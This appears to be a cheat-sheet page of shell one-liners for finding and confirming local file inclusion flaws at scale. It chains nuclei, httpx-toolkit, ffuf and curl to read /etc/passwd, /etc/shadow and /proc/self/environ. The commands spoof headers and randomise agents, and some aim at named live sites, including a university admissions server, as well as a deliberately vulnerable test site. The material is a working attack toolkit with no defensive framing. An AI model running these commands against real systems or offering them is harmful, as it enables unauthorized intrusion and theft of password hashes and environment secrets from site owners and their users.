Local file inclusion (LFI)
cat check.txt | nuclei -dast -t /root/.local/nuclei-templates/dast/vulnerabilities/lfi/ -H "User-Agent: ..." -H "X-Forwarded-For: 127.0.0.1" -fm singlecat check.txt | sed 's/=.*/=/' | xargs -P 20 -I {} sh -c 'echo {} | httpx-toolkit -paths /lfi.txt -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:" -silent | head -n 1' > lfi_hits.txt && while read -r url; do echo -n "$url ... "; if curl -s -k --max-time 10 "$url" | grep -q "root:[x*$][^:]*:0:0:"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$url" >> confirmed_lfi.txt; else echo -e "\033[1;31mFAILED\033[0m"; fi; done < lfi_hits.txtCheck All Paths
while read -r url; do for path in "/etc/passwd" "/etc/shadow" "/etc/shells" "/etc/group" "/etc/profile" "/etc/hosts" "/proc/self/environ" "/proc/self/status" "/proc/mounts" "/proc/version" "/bin/sh"; do modified_url="${url/\/etc\/passwd/$path}"; echo -n "$modified_url ... "; response=$(curl -s -k --max-time 10 "$modified_url"); if [[ "$path" == "/etc/passwd" ]] && echo "$response" | grep -q "root:[x*$][^:]*:0:0:"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/etc/shadow" ]] && echo "$response" | grep -q "root:\$[0-9]\$[a-zA-Z0-9]"; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif [[ "$path" == "/proc/self/environ" ]] && echo "$response" | grep -q "USER=\|PATH="; then echo -e "\033[1;32mCONFIRMED\033[0m" && echo "$modified_url" >> confirmed_lfi.txt; elif echo "$response" | grep -q "Permission denied\|No such file\|Forbidden\|Error"; then echo -e "\033[1;33mBLOCKED\033[0m"; else echo -e "\033[1;31mSAFE\033[0m"; fi; done; done < lfi_hits.txtecho "https://mylocal.life/index.php?page=" | sed 's/=.*/=/' | httpx-toolkit -paths /lfi.txt -threads 50 -random-agent -mc 200 -mr "root:(x|\*|\$[^\:]*):0:0:"
echo "http://testphp.vulnweb.com/showimage.php?file=" | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w /lfi.txt -c -mr "root:(x|\*|\$[^\:]*):0:0:" -v; done
echo "https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=2" | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'Last updated